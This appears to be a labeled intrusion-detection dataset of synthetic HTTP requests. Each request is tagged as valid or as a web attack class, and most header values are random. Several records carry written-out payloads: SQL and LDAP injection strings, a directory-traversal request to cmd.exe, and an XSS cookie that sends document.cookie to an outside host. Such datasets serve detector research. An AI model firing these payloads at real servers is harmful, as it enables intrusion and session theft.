class: SqlInjection
GET /9vbelneghe9hiAuy/tGgrttsragntnnhio/5u518KpMx9tmp8KW/iEgNoeitwg6hmav/3b/axHuPX/nPH/tIlcihe8thepaeInsewn.swf?rvwherebodym=s3&nf9dlsx=+it&bs8itaynhhde=f9ntt0 HTTP/1.1
Host: 6.242.83.50
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ;    EXEC('UNI'+'ON'+'    '+'SEL'+'ECT     'Ne6I',24,688,'innOgas',9 FROM     hauret8ie)
Cache-Control: no-cache
Client-ip: 206.238.177.255
Cookie: 1Dcngmtni0p=hOlneckstueb;tnacale=ewscriptetT%s;@body0X=33106939;tnaorrir2h=13217
Cookie2: $Version="15"
Date: Fri, 23 Oct 09 01:21:25 UTC
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 85nrsds=oapP
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Fri, 19 May 06 13:14:14 UTC
If-Match: "LVwtOtk52KkbaPTLdU.u"
If-None-Match: "3BDOlKWw_uW9mHX"
If-Range: *
Max-Forwards: 042
MIME-Version: 2.3
Pragma: ocst81en='tbnPE'
Proxy-Authorization: Basic aGEwa2hyNDpvZWN0
Authorization: Basic dEF3b2VidDpQeVR1
Referer: /kiiltrq/iNsm/aslsee/tein/nooa.sh
TE: trailers,chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: dottniahn/4.9
UA-CPU: 68000
UA-Disp: 940,2353,32
UA-Color: color16
UA-Pixels: 598x7537
Via: 5.8 www.dalss5b.html
Transfer-Encoding: deflate
Upgrade: WmdnaR/6.5, nsor/8.1, 4151p/2.5, 0uhl6/4.4, 2wnsz/5.7
X-Forwarded-For: 210.0.243.252
X-Serial-Number: 480673046324930914
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41230
Start - Id: 32803
class: Valid
POST /tdoosnfUlw/yLZzl/sFTeu8hg_B77/sobrTHt3qKjSwyUwU1l9/2ceeTHn70oUqoifini/lho5stoc/wersotDncziTr/eqqz-A./etifr0wu.bin? HTTP/1.0
Content-Length: 281
Content-Language: ihm
Content-Encoding: gzip
Content-Location: /afoio/eayf/RsIpgiem.pl
Content-MD5: bjJlUjFoMFNzZWh0ZTJzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Feb 07 16:03:14 GMT
Last-Modified: Mon, 23 Aug 04 14:57:03 UTC
Host: 23.191.68.90
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: no-dylsyca;q=0.0, mes2nwra-ensaeo;q=0.4, c-h, eb9t2xba-D5o;q=0.1, lMr-FdsTj9
Cache-Control: min-fresh=23
Client-ip: 87.184.46.126
Cookie: htrooNeRrh99=68977
Cookie2: $Version="8"
Date: Tue, 24 Feb 04 08:07:06 UTC
ETag: "HlEC7lCerhIraTrPiUm"
Expect: 100-continue
From: hnasx@etin.de
If-Modified-Since: Fri, 18 Jul 08 24:43:24 GMT
If-Unmodified-Since: Wed, 27 Jun 07 12:07:34 UTC
If-Match: "ytIv_7VFSPvXvBO"
If-None-Match: *
If-Range: Sat, 06 Feb 10 02:36:33 UTC
Max-Forwards: 7407
MIME-Version: 7.7
Pragma: rltee=ia
Proxy-Authorization: NTLM ZUxsc2pyc05oaDZlNnRzZWxuZWVzZUVpNG4wZXRldzVoaWVobnpwcmFlQ08=
Authorization: NTLM VWRkdWNDNGVkZXNlZm5kb2hpdHNlcGhyc2VpZmVFbWl5eWVFdg==
Range: 20567-6258,-56087
Referer: /kdt3whsd/eahep/tbp13ev/qngee.php
TE: trailers,deflate
Trailer: Host
User-Agent: em2kia7Ep/8.7
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 373x2208
Via: 4.4 www.bluer.shtml:49243, 0.3 254.125.216.27, 2.6 www.ii43ea.jpeg:9414
Transfer-Encoding: identity
Upgrade: tehms1/9.2, aldet/0.5, tbee/7.6
Warning: 045 www.elolydv.png "pbietttuaolq" "Sat, 01 Sep 07 19:08:20 UTC"
X-Forwarded-For: 16.56.48.17
X-Serial-Number: 6352677
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

leeea9sur=?opt&daist=eo'enEnupdateeubgsound& &01W46NsoIH=t8tVKwK7rqQ&ib3vhOiw2ds=eyS_o&itHbmNo=osSCBs&esaanhs=rqe&em=tvXEy0&rr1.MPPGH=5821638191&t8e8Wr6ve9hiin=S@u?/ i$edreplacetim&bfslrtrHasoni3=>ah&4fiuGocandmi=tkjg_jjDayA&okusTlLspe=445&ejSsttda=4&nosnu1=2660841

End - Id: 32803
Start - Id: 37857
class: LdapInjection
GET /Os27wPwPSSL8/wPl/qgv30/JW3qcmdY9px/retcl87d9ssio/5gjFKIC3vbscript6q/rx/s_iQDzW9tOnWC.msf?ess3t=407&8tsa8weonThnea=22504547&hsan4oresrksse=tytmiid1rapstedtd&udS=98117&hegnllo9uhyUioC=8caltc1pelcliblX&tmJV85PSU86b=8TtE&y5bsgroipeno=31978&c323U=ahz%3Aobjectusrnfh%292%3Dnsock_streamtseee&aiit0paddatun=om&es=uxV99vDODqlH&e12dTdhr=%29++++%28+%7C%28displayName%3Dhad*%29++%28name%3Dhad*+%29%28mail%3Dhad*++%29 HTTP/1.1
Host: www.shq0Em1u.uk
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="49"
Date: Thu, 17 Apr 08 18:58:35 GMT
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 23 Mar 04 21:15:01 UTC
If-Unmodified-Since: Sat, 25 Oct 08 07:48:57 CET
If-Match: *
If-None-Match: *
If-Range: "g.eXlvzwong6b-P_NM"
Max-Forwards: 1
MIME-Version: 7.8
Pragma: enq=dd
Proxy-Authorization: Digest username="otjbsa"
Authorization: Basic YW9odzpsb3Vi
Range: 853418-,-430
Referer: /cAgnA6/eadbW.dll
TE: trailers,chunked;q=0.7,trailers
Trailer: Referer
User-Agent: d.er2bS_3 http://www.sctn5uyt.org
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: deflate
Upgrade: obeThi/2.4, ems/4.7
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37857
Start - Id: 44301
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 50.148.143.235
Connection: aenpn
Accept: text/*;q=0.7, video/quicktime;q=0.1, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: jets-p
Cache-Control: no-cache
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Sun, 09 Jan 05 01:12:42 GMT
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 06 Feb 05 20:30:58 GMT
If-Match: "b-3et0hK1ij@XhQlRZb"
If-None-Match: *
If-Range: Thu, 08 Jun 06 05:24:57 UTC
Max-Forwards: 22
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="herhr"
Authorization: Basic QXZuUmhjcnU6YWc2bmExaA==
Range: 3-
Referer: http://ieoc.uk/olAnnlla/baue/tinh.png
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: sh9esd (cj0lxvT; sPG9kfJ; 5sB_@8-; ddg-Iu4; t.fAvm-nW)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 521x0746
Via: 1.3 www.wttans.png:729
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44301
Start - Id: 46758
class: XSS
GET /ha4i/ttttayt8ooeL/uH4ONGcASbxg/ewKHCLr9SRzQnE8I@r.shtml? HTTP/1.1
Host: 19.231.59.29:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, koi8;q=0.4, euc-tw;q=0.7, cp-936, utf-7;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *
Client-ip: 39.174.238.228
Cookie: Gdatttszo=/6zawce@td;X3nBKH=<div   style = "     background-image:    url(javascript:[document.location.replace    ('http://www.nenarons.com/cgi-bin/sesi.cgi'+document.cookie);]);  "   >;ftptrs=styleabrR]mZu\;bVSQB=passthruIlssu0tmpmy;ksd9bs=dcoptcpro9oum 
Date: Thu, 01 Oct 09 02:01:36 UTC
Expect: gjcr
From: eeadga@ynuze.biz
If-Match: "PdgOD5zccvBJvesIpjh"
Max-Forwards: 1460
Pragma: tn=6krhtAr4
Authorization: tsA1o Hyh3scs=tnii
Referer: http://www.TuoFwjh.net/eadoS.js
User-Agent: nis6ild4eAgtmsrrs
Via: 2.4 www.tmmryel.jpg, FTP/6.9 134.214.128.240
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46758
Start - Id: 9916
class: Valid
GET /idFh.Vng/s1.QI/eZsiVfRJW/nwgFkHER9-WS60F2cW4/hHSyrx/a7/ts0n9@.Q@/vwBrHveV/.P-Y1x/iqqnyueibSstheooi/e_O69eJHwyEgeVQ.js?iktndWRo=bd3roeNzimonhe&htaccesLaLNx3=7883259&GW3DovZ0qt5=6034 HTTP/1.1
Host: www.pohe.st:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: 9hermm-oqoe72dt;q=0.2, feiles-0;q=0.5, yenoEs-f
Cache-Control: rp='xtai'
Client-ip: 51.120.24.26
Cookie: rRhA4chd=etasoa ) teias<eusrDt;ds3ifosht=6;htsa7A=xewgdDr'hi2objectkL;faaee=80370092;puMimaeqoecqifp=178111267
Cookie2: $Version="503"
Date: Mon, 01 Aug 05 16:50:41 UTC
ETag: "Gnh5nWnu7dc3KLCnHJ"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Mon, 05 Jun 06 05:40:34 UTC
If-Unmodified-Since: Fri, 18 Sep 09 04:31:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1758
MIME-Version: 4.6
Pragma: tnce='ons6'
Proxy-Authorization: Basic YzFvNmhldG46dW5uNmxkdDY=
Authorization: yeea kcdmiae=oid2ijBa
Range: -997,-1,-76458
Referer: http://www.mueylph.gov/5see/q5on9beo.jsp
TE: trailers,trailers,deflate;q=0.0
Trailer: Range
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 5.7; 7t-at; rv:4.2.5) Gecko/97567442
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 496x973
Via: HTTP/7.8 www.otc42.jpeg, FTP/1.4 www.ttrlilh.gif, 1.0 215.205.173.141
Transfer-Encoding: deflate
Upgrade: eeTeSO/6.3, 4nyt/9.4
Warning: 613 www.7lzecv.tiff "SviossieRoa" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9916
Start - Id: 11168
class: Valid
GET /c.c-URU6sFUv6EsaH/TO5LBn7Z6/rge7XKckq-hxp46s.brR/yltTffinErtaxasmnfnA/i4adeti4weidRjuwsn.nsf? HTTP/1.1
Host: www.yowdqonesy.org
Connection: close
Accept: application/rtf, application/zip;q=0.6, application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 86.6.116.71
Cookie: 26rhHR=hnmtivnv6sepGrh0m;nbhlir4=>dn-ir~e;elaeodds=ei0uouisw;ECQfP=mmo9iha'b<cdbnt;dlVi2w=ru90n9sulZB4
Cookie2: $Version="468"
Date: Sun, 21 Nov 04 10:09:28 UTC
ETag: "hwjvRvgLLrGep@xBEzc1"
Expect: seenYno=cada
From: daneee@lheneowi.org
If-Modified-Since: Tue, 16 Aug 05 07:09:07 CET
If-Unmodified-Since: Tue, 02 Nov 04 07:05:43 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Apr 05 18:58:51 CET
Max-Forwards: 6145
MIME-Version: 3.8
Pragma: 0s7='r'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: Basic bjJ0SWxpOmF0dHR6
Range: 01809-,9808-,-723
Referer: http://h2dert.biz/ccvd/eRln5/tio4c.sh
TE: trailers,gzip,trailers
Trailer: Pragma
User-Agent: qehieo/8.1.2
UA-CPU: StrongARM
UA-Disp: 5419,0442,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: se9rbj/8.2 www.0aCT4ai.htm, FTP/2.2 84.248.244.44
Transfer-Encoding: gzip
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11168
Start - Id: 37616
class: LdapInjection
PUT /e4ssd4omobao/nonMIsjafwEm/onFteNlxiuyneata/siadt/0aY/bmeaaoeteet1t/2C3Yh/fdessw44htueh6R.mspx? HTTP/1.0
Content-Length: 306
Content-Language: rsr
Content-Encoding: identity
Content-Location: http://www.8tn7tb.net/8simTo.asmx
Content-MD5: ZXl3ZHl0dGFIZm1oZGhlNA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Mar 05 08:39:36 GMT
Last-Modified: Wed, 16 Jul 08 22:54:10 UTC
Host: 28.35.217.122:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-6;q=0.6, windows-1252;q=0.9
Accept-Encoding: gzip, gzip, deflate;q=0.0, deflate, compress
Accept-Language: *;q=0.3
Cache-Control: ee='eytrseue'
Client-ip: 34.23.57.157
Cookie: dhwtis=Fnpoe;0elidixtp4ce=u_m.;Rkl1eib2aq=htn-=MaOls7ti;oeh9h=ishl8 bgsoundaohe
Cookie2: $Version="53"
Date: Thu, 02 Oct 08 24:33:32 CET
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Wed, 18 Aug 04 15:21:39 GMT
If-Unmodified-Since: Mon, 29 Jun 09 20:44:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: NTLM dDhiNmVyYmFrMmJvdWVyMU9xaGl0c28wdW5lWXJldDZlN29hbmwwaWE=
Range: 9-3321,97916-131
Referer: /ntaoaia/nnt9ic/1ahb/oostt/Ktealnpr.swf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 1.4; dH-5y; rv:5.0.5) Gecko/88012839
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 770x317
Via: 1.2 www.tdEnl.tiff
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

scriptmf8L=31050&Zx_9VWusrUR=Rbtea&LZOb04formL=69933049&a12ahpslosai2s=222355&ndxno4eea=6254&4Ttthe2=re1&lahheGderwrus=]a4o&lneesidr=767745&lneydnc=9437963155&1VHC_K=)    (|  (esmo=um*)&chobceEtahte2=l6baqAnApee7lcwro&idtJy=432&2droptmpaPf3WB12=5h93rs&0osdaeqih=ih q%t; :Oapzrejo2exterm

End - Id: 37616
Start - Id: 6097
class: Valid
POST /tgVkRa/ctetoecfpiH0E3aaSb/dHJDVLR.@.86Y3HFOwso/fE6zE0/zeTtxers/LnetcatUIKTvarQ/mSwRCB.jlKVupasswdy8/wget6rXvVMt/rhmHunhuhE.html? HTTP/1.0
Content-Length: 217
Content-Language: tktcytWo,ie,6
Content-Encoding: gzip
Content-Location: /l0ehh/Hdt6Io/epdsoll/runi.css
Content-MD5: ZzRldEFhaGcwZG9kbnBpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Aug 06 01:17:53 GMT
Last-Modified: Wed, 22 Dec 04 17:40:09 GMT
Host: 251.14.28.123
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity;q=0.5, identity
Accept-Language: Hajnth0n-tr, tfkan-terup2i;q=0.8, don-chEta, pt-ts8h3pl;q=0.5, 32auvA-hfs6tcsD;q=0.6
Cache-Control: max-stale
Client-ip: 39.222.108.79
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="3"
Date: Sun, 11 Sep 05 13:27:56 UTC
ETag: "FyD9jloh6p4Fowm9S"
Expect: 100-continue
From: ghtahOkt@redNeaN.biz
If-Modified-Since: Thu, 04 Nov 04 13:32:13 CET
If-Unmodified-Since: Thu, 06 Sep 07 24:48:25 GMT
If-Match: *
If-None-Match: "aKcds.CqvKNQW3s"
If-Range: Sat, 07 Feb 04 12:43:48 CET
Max-Forwards: 4
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic eTV0czM6dGR0c2I=
Range: 32908-897936,302-48186
Referer: /nGeaeelO/ueliax.js
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/1.0 (Windows; U; Win98 7.6; 9t-en; rv:9.8.5) Gecko/58473683
UA-CPU: 68000
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: 4.5 204.121.57.147:2, FTP/6.9 www.ureand.tiff
Transfer-Encoding: deflate
Upgrade: qdoi/7.1, etiX/1.2, Sor/4.3, ex2/0.1
Warning: 920 www.wreat0oe.html "tenate7sct" 
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 124878
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

Rto=400217&fn=Pci5isa&MohsmaiRphoi=7&hPfdwaOhou0C=ss t&hEPCZL=Eshutdown]optm&lrcstconetn=efyG&Notmseev2ieae=nonCdseh8raalc7hn&A3cttrxaeysn4=9865382&bVg=09110355&id9Rn_r=99389292&Uea9RnglCte8Ue=1&meAelato1eev3e7=n:

End - Id: 6097
Start - Id: 27161
class: Valid
GET /8PXU4vYzQT40JHYGu/RBFbinZQstdinD8s6619v/1NL3Z%uJO/s1iodraii/rhlcoeidetiauzcmudaw/zyLX3Jj9Y@8T/et4G4/deeehDaO76moDooaa8.aspx?SXMI=v+ieor%24o&oonirhZlraia=2384&5Yi2WKMft9MO=i0Q4iathffoli&ioiitdrft=32128062&ti=sXOee&Sd@-MBopt=FAtxeee&nr0toaaet=rw%5D%7Eumeexec+null&f4Kg64m1=2l+&tyiatad=66173&eV2taeqd=wf2wlubeatxtHn&roc=6448465&lilsr=o9oeor%3B&sEs-=ttbiy&zzeAh1=rd%25Ydge2ohtpass%7E&osscs=%3Cdstdinnonlog%24 HTTP/1.0
Host: www.ksoly9u.de
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1251, windows-1253;q=0.0, windows-1255
Accept-Encoding: 
Accept-Language: tWhloiwq-c5i;q=0.0
Cache-Control: only-if-cached
Client-ip: 140.73.169.111
Cookie: ete=xwe;hpehainuits= hns0ihnauit;zsn4ronnoes=rZSURNGYNnK;XZlogk.ps=4095665;jEresvpad=mauts'd<nrno h;SrBkR3=:bgroup byohGdtt 
Cookie2: $Version="431"
Date: Tue, 13 Oct 09 07:25:55 CET
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Sun, 11 Apr 04 06:45:51 UTC
If-Unmodified-Since: Wed, 21 Dec 05 03:17:11 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Mar 05 10:35:20 GMT
Max-Forwards: 005
MIME-Version: 6.1
Pragma: faakatsf='rhs2o'
Proxy-Authorization: Basic MHRsaWRkYWo6bmFndg==
Authorization: sswNat otsbM5A=7suiy
Range: 026-10,-71,7-952
Referer: http://cA2oe.ch/etdh/ereemtd/omz0/h7ttte.cfm
TE: deflate
Trailer: Warning
User-Agent: oShed3utem/9.5.0.8
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 925x719
Via: 9.1 54.163.2.220, HTTP/7.8 www.sgurm.png, 1.4 39.208.210.4:61809
Transfer-Encoding: deflate
Upgrade: r0y/8.7, Adrt/6.0, umnt/2.1
Warning: 155 178.62.125.32 "Eo0ociateciwndeeoItt" "Mon, 30 Apr 07 10:40:21 GMT"
X-Forwarded-For: 183.28.170.69
X-Serial-Number: 0696740
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 27161
Start - Id: 37265
class: LdapInjection
GET /ttV7a/rSdeflioOgwqx/sfZ/eobtessiic0dtai/pZfj1vKcwcXiOJ.aspx?GNwLhoxml6ne=652033&IpvKwg=569321&wh3t2jfti=08257732&lshxutqwpUcRso=wq1mo%29%28++++%7C++%2873Qqe%3D*%29&xzran3yioe8tNep=vresl&otrSinwetdytt=fiLrod1bnzncu&dHy=hc%3Abn4%3Fseh%2F%250ht+nlib&iwtivtbdnebr4on=85381433&u5hntmt=e7dmqm0mnne HTTP/1.0
Host: www.DeiH.ch
Connection: itoplE
Accept: text/plain;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: etA0ds='arpoe'
Client-ip: 5.202.43.68
Cookie: n6tn_meta=iaaim2soairhhw;nt=uwei
Cookie2: $Version="54"
Date: Wed, 07 Apr 04 11:10:21 UTC
ETag: "yl.C9suIrkwr8sljNEE"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Sun, 27 Sep 09 16:18:48 GMT
If-Unmodified-Since: Sat, 15 Sep 07 02:57:21 UTC
If-Match: *
If-None-Match: "iIRmCLKqu4.t8i5"
If-Range: *
Max-Forwards: 8
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: Digest opaque="Onooem"
Range: 306-7480,026547-8
Referer: /Lupfwgww/8mavFssh/v7dKi/Ana9w.js
TE: trailers
Trailer: Referer
User-Agent: g71ttahnEiev2isfepc
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: biYssa/2.4 www.prpotaas.gif:57274, rloe/0.5 123.233.236.238
Transfer-Encoding: identity
Upgrade: usrp/4.7
Warning: 296 78.191.137.211 "vniip" 
X-Forwarded-For: 52.224.58.103
X-Serial-Number: 4915309492060646563
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37265
Start - Id: 5242
class: Valid
POST /4uldud3Q.msf? HTTP/1.0
Content-Length: 58
Content-Language: 3h
Content-Encoding: identity
Content-Location: /odse6oi/rlkjib/ga70eO/hnno/vheYen.jpg
Content-MD5: bnRsNDlzc2xtdGFzcWFzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Dec 08 20:23:55 CET
Last-Modified: Tue, 21 Mar 06 20:29:21 UTC
Host: www.eurfo.be:80
Connection: keep-alive
Accept: application/rtf;q=0.2, audio/*
Accept-Charset: windows-1253;q=0.6, cp-936, x-mac-roman;q=0.6, x-mac-korean
Accept-Encoding: *
Accept-Language: aJutfdr-O;q=0.6, Rwdseo-eetLidot
Cache-Control: no-transform
Client-ip: 78.163.7.145
Cookie: niie86eiogs=8;zk@@zLYa=3856829;tatL=076061214;EwCvbscript7fd0a=1wbheeoHmghoth;gWeon=711
Cookie2: $Version="38"
Date: Sun, 10 Jun 07 19:29:35 CET
ETag: "y3NKcKvbtPlTr-fH"
Expect: oi8gdf
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Mon, 19 Jul 04 16:39:38 CET
If-Unmodified-Since: Wed, 24 Aug 05 02:55:12 UTC
If-Match: "4aujJZ0B7vuH-nw4k57"
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:43:30 CET
Max-Forwards: 8317
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: hhad rueehhom=useiI
Authorization: isuhi sap3ps=xyziagf
Range: 627-96060,029458-
Referer: http://shnent.ch/s2at2/enrrree/q0naat/mrt7nshx.swf
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/1.6 (X11; U; Open BSD i386 2.6; 8b-du; rv:6.0.9) Gecko/75287324
UA-CPU: PowerPC
UA-Disp: 793,8160,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4414x768
Via: HTTP/3.2 231.231.143.171
Transfer-Encoding: compress
Upgrade: dnid/6.6, cGoH/6.5, no1o/5.3, ni9ihh/8.4
Warning: 362 www.tsihSe9.js "t0omneapbr2e9lmgou4g" "Fri, 03 Mar 06 12:16:45 UTC"
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

KL61Jxml=teh &0s=L&cbinm=emse&3coPi0l=3349&coen=2TzFCr3KNX

End - Id: 5242
Start - Id: 32381
class: Valid
GET /rjHbHQJd-iGk/Fe1hFlsECnph-/reOJHaFo_q-1p/ySit0VEYU@cp1awfd/3hXB0xnodeU/v0rm/bmuulie3s6smgmaArhet/8q3ZZrSejKk9rGh./o@WLg6gD.cfm?rnu=3276622&3Ek6vDEwp-y=niu%2Fid2od&iiwzlwnsataedhm=Vi&sstNdfmreahtret=06&mwe=zeawhereaara&boggrro=7200628&llEkb_eArmN=597746&e9onbac7tp8Ti2h=66464&reptst7i0Tatoe=rqp2P2VI&OTYiE=337417729&sh=iOlmsa HTTP/1.0
Host: www.itvtAelsa.it
Connection: keep-alive
Accept: text/html;q=0.6
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: t1ni-clgtut, DrklW-enoo;q=0.0
Cache-Control: no-store
Client-ip: 108.83.0.215
Cookie: ce8enait= htacces+a;tenIrteN=ootwge;and88VbqEY=rgninNeokaeageU;Ehl=195043
Cookie2: $Version="300"
Date: Thu, 09 Oct 08 17:47:02 CET
ETag: "bcP7TEQV0EcuH2331p"
Expect: ajnerm=onntwu;abgnaaoI=itsi
From: itad@eosuny.org
If-Modified-Since: Fri, 25 Jan 08 07:43:38 GMT
If-Unmodified-Since: Thu, 16 Jun 05 09:29:22 CET
If-Match: *
If-None-Match: "jsXCbpXs0iVNJ7qFS"
If-Range: Sun, 18 Mar 07 13:50:32 GMT
Max-Forwards: 858
MIME-Version: 4.2
Pragma: tea='aq'
Proxy-Authorization: NTLM ZnQ1NXRsZTZvbW5ocmVjandpZWZhZmV0bXVveUhvcnNscXNnbGxhanIydG10aHhj
Authorization: Digest qop=auth-int
Range: 36-,82952-6516,-8189
Referer: /hklmvh9i/wtqveett/ho6aart.conf
TE: gzip;q=0.7
Trailer: Host
User-Agent: onatcDs (97h4@.Jjv; uEzEhHdv2j; rpKd0O; tn@2Jot)
UA-Disp: 0077,169,16
UA-OS: Windows NT
UA-Color: color16
Via: 5.9 www.aTixailr.shtml
Transfer-Encoding: identity
Upgrade: ddG/8.0, tra/2.3
Warning: 283 www.IAam50so.html "n1tieeRszdIlt1mom" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 02894265118985687
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32381
Start - Id: 45040
class: PathTransversal
POST /ca1gnnfwcenRenm/stnapw/XFIws/UzodRihomeR0g4trd/5SBkzm@Eg/tEilAtjnhsinhA/rsd00uZxWi6RNrKl/sseatk.bin? HTTP/1.1
Content-Length: 210
Content-Language: egv,s,rsnaot
Content-Encoding: deflate
Content-Location: http://oorciDs.fr/t1njestt/j1wse/2nrnsO.mdb
Content-MD5: bmluYWVzc2JzcGhlVHN3bg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Apr 10 10:19:17 CET
Last-Modified: Mon, 19 Dec 05 05:02:09 GMT
Host: www.lupg.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.124.10.30
